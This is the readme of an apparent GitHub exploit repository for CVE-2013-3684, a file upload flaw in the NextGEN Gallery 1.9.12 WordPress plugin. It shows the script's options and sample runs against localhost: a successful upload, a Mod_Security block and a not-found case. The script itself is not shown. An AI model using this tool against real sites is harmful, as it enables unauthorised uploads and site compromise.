Switch branches/tags
Nothing to show
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
..
Failed to load latest commit information.
cve-2013-3684.py
readme.txt

readme.txt

[The below example shows the help menu]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress  -h
usage: cve-2013-3684.py [-h] -i IP -u URI

NextGEN Gallery 1.9.12 Arbitrary File Upload (CVE-2013-3684)
optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        IP address or host name
  -u URI, --uri URI     URI path /wordpress
  -f FILE, --file FILE  File to upload
--------------------------------------------------------------------------------------------------


[The below example shows that NextGEN Gallery is found on host but attempt is successful]
--------------------------------------------------------------------------------------------------
python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt
[*] Wordpress Plugin: NextGEN Gallery found
[*] File has been uploaded successfully. Please check the below location

******************************************************************************
http://127.0.0.1/wordpress/wordpress/wp-content/[gallery_name]/file1.gif
******************************************************************************
--------------------------------------------------------------------------------------------------


--------------------------------------------------------------------------------------------------
[The below example shows that NextGEN Gallery is found on host but attempt is unsuccessful]

python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress -f test.txt
[*] Wordpress Plugin: NextGEN Gallery found
[*] Failed: NextGEN Gallery is not vulnerable or attempt has been blocked
******************************************************************************
(406, 'Not Acceptable', '<head><title>Not Acceptable!</title></head><body><h1>Not Acceptable!</h1><p>An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.</p></body></html>')
******************************************************************************
--------------------------------------------------------------------------------------------------


--------------------------------------------------------------------------------------------------
[The below example shows that NextGEN Gallery is not found on host]

python cve-2013-3684.py -i 127.0.0.1 -u /wordpress/wordpress1
[*] Wordpress Plugin: NextGEN Gallery NOT found
--------------------------------------------------------------------------------------------------